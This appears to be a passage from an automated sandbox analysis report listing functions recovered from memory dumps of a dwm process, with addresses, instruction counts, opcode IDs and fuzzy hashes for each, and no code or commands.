                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 7acb123cf6e54beec420f03a74cc6ba43d72fffee62007052a022077cf2e4a12
                                                              • Instruction ID: dad6f3d2b9dccbbe685951510d99dd1b2bd225ac6b41aaa7595cc7f936403fdf
                                                              • Opcode Fuzzy Hash: 7acb123cf6e54beec420f03a74cc6ba43d72fffee62007052a022077cf2e4a12
                                                              • Instruction Fuzzy Hash: 81E06D7160F7C48FC71AAA748869454BFA0EF6720174A46EFC046CF1B7EA2D8889CB01
                                                              Function 00007FFD9B7BAB99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: b47d6fe14c3174b3de2058bfa9f0386428db43f706162ab59f77e405e4e76ca9
                                                              • Instruction ID: b9871df1220c5717cfbd0dce8416a73a09bf9cdd13b41f769dc6ad9c0c2ad4dd
                                                              • Opcode Fuzzy Hash: b47d6fe14c3174b3de2058bfa9f0386428db43f706162ab59f77e405e4e76ca9
                                                              • Instruction Fuzzy Hash: A3E0ED6154F3D44FCB16AB7488698453F60EE6B21174B41DEC155CB1B3EA199949C701
                                                              Function 00007FFD9B793C49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 548f86866a01a74d395cb633a37a2bb7fdcbba46857ab5e0e6f0bda9d6287db1
                                                              • Instruction ID: 15e038495616df917a60a763cac2f5b8106024bf485c7a505532ae8c2edb6a85
                                                              • Opcode Fuzzy Hash: 548f86866a01a74d395cb633a37a2bb7fdcbba46857ab5e0e6f0bda9d6287db1
                                                              • Instruction Fuzzy Hash: 53E01A6054A3C44FCB06EB7488698443F70DE6721078A41DEC049CB1B3E62D8949C701
                                                              Function 00007FFD9B7B1DD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction ID: be9d14774810aa6bccb53f8b8f2aef84cbd445e0a43f8931e159da244751b328
                                                              • Opcode Fuzzy Hash: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction Fuzzy Hash: ECE01A6054A3C04FCB0AEB7484698447F70AE6B21078B41DEC049CB1B3D62D8949C701
                                                              Function 00007FFD9B7B7089 Relevance: .5, Instructions: 497COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a19c02f947fe7cb4bccd024b92a1841dd449555c656030d9be360ac0b345d47
                                                              • Instruction ID: 541214298241f217392d783726cce2b07807ab18eff916a9ddf082e7456a652d
                                                              • Opcode Fuzzy Hash: 4a19c02f947fe7cb4bccd024b92a1841dd449555c656030d9be360ac0b345d47
                                                              • Instruction Fuzzy Hash: ED024A31A0D7995FE7259B6888616A53BE1EF42310F0502FED44D8B1F3DE28AD46CF91
                                                              Function 00007FFD9B7B344D Relevance: .3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9a58a2d74b710db3fbc14ac196f70479149b925b9080d7b7d60cf7e1b8c72cf0
                                                              • Instruction ID: 4c08760f7b90a5100b7678aeb1aa3bb35627882dab59e7e7c04fe3f19b08facb
                                                              • Opcode Fuzzy Hash: 9a58a2d74b710db3fbc14ac196f70479149b925b9080d7b7d60cf7e1b8c72cf0
                                                              • Instruction Fuzzy Hash: 7991F661B1DA5E0FEB9CEA6C487667573C2EF94300F45427AD40EC72E7DD28BD818A90
                                                              Function 00007FFD9B7B2411 Relevance: .2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59908ae50582167a2d30a6cb2b2c9b3be67684e562e645f22391d202c7b67556
                                                              • Instruction ID: bdad72fcd6c882cdedb3a8be1ea263cb38e57cfe560d7058035cd71d2119b090
                                                              • Opcode Fuzzy Hash: 59908ae50582167a2d30a6cb2b2c9b3be67684e562e645f22391d202c7b67556
                                                              • Instruction Fuzzy Hash: 8151E831B0D75D4FDB68EB58D864AA877D2FB94310F0502BAD00DD72E6CE28AD458F81
                                                              Function 00007FFD9B780945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction ID: e5cb615937688ad0b9fcfbfe5a384d5356d8417bfd627d28e2c45eeb832c2d6f
                                                              • Opcode Fuzzy Hash: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction Fuzzy Hash: E341033270D9184FE728EAACF89A9F973D0EF4532170501BBE48AC7167DE11AC8287C5
                                                              Function 00007FFD9B780960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64fa898d34ecc6204b6a8da07447aa87b2d6ebb37e74176bcb88646ec68da059
                                                              • Instruction ID: 69ac05225e3681eeda80166abccfd05498d2fb7e74f08af649c7f588ca92e566
                                                              • Opcode Fuzzy Hash: 64fa898d34ecc6204b6a8da07447aa87b2d6ebb37e74176bcb88646ec68da059
                                                              • Instruction Fuzzy Hash: 7331D826B5DA1D0FE75CB66C64A6AF977C2DF98361B1401BAE40EC32F7DD28AC414284
                                                              Function 00007FFD9B78116D Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d40eaf75e5c0b43c2c49d0a931015e025481939e5621cb94f465d9113da47a1
                                                              • Instruction ID: a6184804b176742288dd08183e513810f8850e31c098218bd1a822739682dc87
                                                              • Opcode Fuzzy Hash: 1d40eaf75e5c0b43c2c49d0a931015e025481939e5621cb94f465d9113da47a1
                                                              • Instruction Fuzzy Hash: 8D31B631E09A4E8FDB45EB68C8A49A97BF0FF5A311F0546BAC009D71B2DB38A541CB40
                                                              Function 00007FFD9B780998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5209af4af6651ad48c5946537454f1455eac5e26c098ada7e15179e3de32911
                                                              • Instruction ID: 4bfccd40ab83792f431f9a52bbf622a60a8deca77cc5ccbeec63c51004c14b89
                                                              • Opcode Fuzzy Hash: d5209af4af6651ad48c5946537454f1455eac5e26c098ada7e15179e3de32911
                                                              • Instruction Fuzzy Hash: 8C21F920B19E1D0FE79CF76D54AA67576C2EB9C312B5101B9E40EC32F6DD28DC428285
                                                              Function 00007FFD9B7B6FE8 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction ID: 905fe853454272e25f0d5d5a0c418f9fdb33f45c25f3cc13fe0950c524b69a0f
                                                              • Opcode Fuzzy Hash: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction Fuzzy Hash: 2B112E2BF4C2610EE319B7BDB4764FD3790DF5113970842B7E19DC91E3ED19644A8A84
                                                              Function 00007FFD9B786CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a6ea3cefb8ca457b2338805d548966cca434a1e8a779e50d0334a80b3a5d553
                                                              • Instruction ID: 3f74525e1d43d78255200cc1ed85fd70f5737ef338ee15eb7f4728be443d22c2
                                                              • Opcode Fuzzy Hash: 1a6ea3cefb8ca457b2338805d548966cca434a1e8a779e50d0334a80b3a5d553
                                                              • Instruction Fuzzy Hash: F7211F31E19E1D9FDBA5DB48C4A07E973E1FB58311F1102BAD40DD32B1DA75AA408B80
                                                              Function 00007FFD9B7941BB Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2f0be3a00c467420c78fa539ff329fee201b771cd99a389916bcd00bef1cb2c
                                                              • Instruction ID: 9e8c4834e2c00a00d594036911ad696ad4710021f0adb95a37692d3eae9093d3
                                                              • Opcode Fuzzy Hash: b2f0be3a00c467420c78fa539ff329fee201b771cd99a389916bcd00bef1cb2c
                                                              • Instruction Fuzzy Hash: 09118C71E08A1E8BEB24DF88DC686BD77B2FF44314F51033AD41A972A5DF782A018780
                                                              Function 00007FFD9B7BD675 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: baa3fa1cc64cb4299503ff8c3f0a93c4a4f91fa4767db82a3bea793d04ce52a4
                                                              • Instruction ID: b136c46b3acc1f7357ce2a1006a04add714af4844bab7c48873d77718a29bd8a
                                                              • Opcode Fuzzy Hash: baa3fa1cc64cb4299503ff8c3f0a93c4a4f91fa4767db82a3bea793d04ce52a4
                                                              • Instruction Fuzzy Hash: 82019E31B0562E4BFB68C69894657F977E1EF84344F050239D40ED21E1DA28AE408F80
                                                              Function 00007FFD9B7BB23D Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d24229bf8ff7134fd2d0cf2fce4b9c1c99074224aace1fd35273c50fd14c004
                                                              • Instruction ID: ffa129d05c0d6e676efa4ed30aa00671c74b75845878af26d9f5923b6f77012e
                                                              • Opcode Fuzzy Hash: 1d24229bf8ff7134fd2d0cf2fce4b9c1c99074224aace1fd35273c50fd14c004
                                                              • Instruction Fuzzy Hash: DCF06D31B09A1E4EEB94EA9C54A67F877D1EF98312F440176E41CC32B2CE2869864B91
                                                              Function 00007FFD9B784CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction ID: da51c9fa52b7cef639a1733a7d3759ea6381a400f3ef9667fa2d7d180bcb1368
                                                              • Opcode Fuzzy Hash: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction Fuzzy Hash: BE011E60E19F1D4EE7B5A65888B47B971D1AF48702F4202B9E45EE32B2DF786E404600
                                                              Function 00007FFD9B7B7A3D Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 71756f43975670f075d0df9702dd65893daffc051f65922f9c9bda5bb278888f
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: FEF06922A0E7C55FD31A073888754687F71AE6722530B01E7C095CF0F3D9299D8AC762
                                                              Function 00007FFD9B784D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 01faf4bb102ef15a40fe28a017c915bb05845bdf3bd224aa624573ac65a7f278
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 2E011230A19B1E8EEB38EA54D8A47F532A1FF54702F1111BDD40ED31B2EA7C2B818A00
                                                              Function 00007FFD9B794935 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Function 00007FFD9B7BAB09 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
                                                              Function 00007FFD9B784DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Function 00007FFD9B7B1D49 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Function 00007FFD9B7B8299 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Function 00007FFD9B784B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Function 00007FFD9B7BD7E9 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Function 00007FFD9B795380 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Function 00007FFD9B7959C0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction ID: 1ab617b5807b60862730bf7e2eea1a76f8055e7b0ce4c2cca0b37e0c22b51329
                                                              • Opcode Fuzzy Hash: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction Fuzzy Hash: C2D05E30B60A0D4B8B4CA62D8868430B3D2F7AA2067A45278940BC6295ED25ECC68B81
                                                              Function 00007FFD9B7BA670 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B7BA5E0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B783276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: 4b7b4d292ed0ec8a4721965bc28670ff99bf46d5edff54a11296b8e382a75cb2
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: D5E01230F0DA1E46FBA49144C8A07E97394EF94312F1601B8D58EA33E1DD38AFC48A45
